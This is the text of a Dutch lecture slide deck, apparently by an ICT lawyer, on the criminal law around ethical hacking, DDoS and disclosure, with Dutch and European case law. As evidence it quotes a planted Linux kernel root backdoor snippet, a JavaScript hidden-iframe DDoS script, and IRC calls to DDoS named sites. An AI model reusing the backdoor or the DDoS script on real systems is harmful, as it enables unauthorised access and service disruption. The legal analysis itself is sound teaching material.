Wat is het verschil tussen de TNT-staking en de DDoS?-aanvallen op Paypal? Mag je je eigen bank hacken om te zien of ze wel veilig genoeg zijn voor je geld? En als je de ov-chipkaart gekraakt hebt, mag je dan als proof of concept ermee gaan reizen? De wet stelt grenzen aan ethisch hacken, maar is niet zwart-wit. Dezelfde handeling kan legaal of illegaal zijn afhankelijk van je intentie en de omstandigheden waaronder je deze begaat.

2. Computervredebreuk
(art. 138a Strafrecht)
Opzettelijk en wederrechtelijk
binnendringen
in een geautomatiseerd werk

3. Doorbreken van een beveiliging
if ((options ==
(__WCLONE|__WALL)) &&
(current->uid = 0))
retval = -EINVAL;

4. Gebruik van valse signalen
of een valse sleutel

5. Aannemen van een
valse hoedanigheid

6. Computervredebreuk
(art. 138a Strafrecht)
Maar OOK als het
systeem onbeveiligd is!

7. Computervredebreuk
(art. 138a Strafrecht)
Citaat van de minister (2006):
“Wel moet het voor de potentiële dader
kenbaar zijn dat hij zich
op verboden terrein bevindt.”
Wetsvoorstel Computercriminaliteit II,
Memorie van Toelichting (TK 26671 nr. 3)

9. Rb. Den Haag 2 april 2010,
LJN: BM1481

10. Cracking tools
(art. 139d Strafrecht)
Technisch hulpmiddel dat
hoofdzakelijk geschikt of
ontworpen is om
computervredebreuk mee te plegen

12. Hoge Raad 29-03-2005, LJN: AS4663

14. “Voorzover de voorzieningenrechter
kan nagaan bevatten de twee
‘Attacks’ een in hoge mate theoretisch
wiskundige beschrijving, maar bevat
het artikel in ieder geval zeker niet een
praktische handleiding voor het kraken
en klonen van de chip.”
Rechtbank Arnhem 18-07-2008,
LJN: BD7578

15. Denial of service
(art. 138b Strafrecht)
Opzettelijk en wederrechtelijk
toegang tot computer of netwerk
belemmeren door
toezenden van gegevens

17. for(var i =0; i<1; i++) {
ip = new Array();
for(var j=0; j<4; j++){
ip.push(Math.round(Math.random()*255));
}
ip = ip.join('.');
document.write('<iframe
src="http://bluf2008.geencommentaar.nl/isGeenStijl
.php?ip='+ip+'" width="1" height="1"
style="position: absolute; top:
-50px;"></iframe>');
}

18. Beschadigen van systemen
(art. 161sexies Strafrecht)
Opzettelijk en wederrechtelijk
computersysteem of netwerk
vernielen, beschadigen of
onbruikbaar maken

19. Beschadigen van systemen
(art. 161sexies Strafrecht)
Strafverhoging als daarbij
gemeen gevaar voor goederen
of diensten optreedt
(en nog meer bij levensgevaar)

20. Rechtbank Rotterdam 14-4-2010,
LJN: BM1172

21. “De providers Argeweb en Leaseweb
faciliteren het internetverkeer van ruim
50.000 klanten. De infrastructuur van
deze providers kan derhalve worden
gezien als een vitale infrastructuur.”
Rechtbank Rotterdam 14-4-2010,
LJN: BM1172

22. <0x1fe> was je nog van plan overheid.nl te ddossen?
...
<0x1fe> waarom doen wij dat niet nu?
Rechtbank 's-Gravenhage 14-3-2005
LJN: AT0222

23. <0x1fe> kan iedereen ff geenstijl.nl pakken (…) aub?
Rechtbank 's-Gravenhage 14-3-2005
LJN: AT0222

27. “Journalists cannot, in principle, be released from
their duty to obey the ordinary criminal law on the
basis that Article 10 affords them protection”
“It falls to be decided whether, in the particular
circumstances of the case, the interest in the
public's being informed outweighed the 'duties
and responsibilities' the journalists had as a result
of the suspect origin of the documents that were
sent to them.”
EHRM 21 januari 1999, NJ 1999, 713

28. HR 27 juni 1995, NJ 1995, 711

29. “Nu het aan de verdachte ten laste
gelegde het doel van zijn onderzoek
(publiekelijk bewijs te vergaren voor
zijn stellingen) voorbij is geschoten en
hem andere, minder verstrekkende
methodes ten dienste stonden...”
Hoge Raad 5-12-2006
LJN AY8343

30. Rechtbank 's-Gravenhage 23-11-2009,
LJN: BK4065

31. Rechtbank Amsterdam 20-04-2005,
LJN: AT4199

32. “Openbaarmaking dient geen publiek
belang: zij levert geen enkele bijdrage aan
het publieke debat over een maatschappelijk
relevante kwestie en heeft geen ander doel
dan de bevrediging van de nieuwsgierigheid
van een sensatiebelust publiek.”
Rechtbank Amsterdam 20-04-2005,
LJN: AT4199

33. http://www.e-beat.nl/
examen.php?id=174&cijfer=7.5

34. “Om te beginnen is voldoende aannemelijk dat
in dit geval sprake is van een goedbedoelde
en onschuldige actie van de werknemer van
Handyman, juist gericht op het behartigen
van het belang van The BEAT Factory, die dit
zeer wel zó kon begrijpen en er zó ook profijt
van had kunnen hebben.”
Rechtbank Breda, 6 januari 2009,
LJN: BG9038

36. “Het Hof overweegt dat het algemeen belang
op toegang tot informatie over ongepaste druk
en misstanden in het Openbaar Ministerie zó
belangrijk is in een democratische rechtsstaat
dat het zwaarder weegt dan het belang om
het vertrouwen in datzelfde Openbaar
Ministerie te beschermen.”
EHRM 12 februari 2008, Guja vs Moldavië,
zaaknr. 14277/04.

37. A.Engelfriet@ICTRecht.nl
@ICTRecht
“Een eerlijke balans die moet worden
getroffen tussen het algemeen
belang van de gemeenschap en de
belangen van het individu.”
EHRM 6 mei 2003, Appleby vs. UK
zaaknr. 44306/98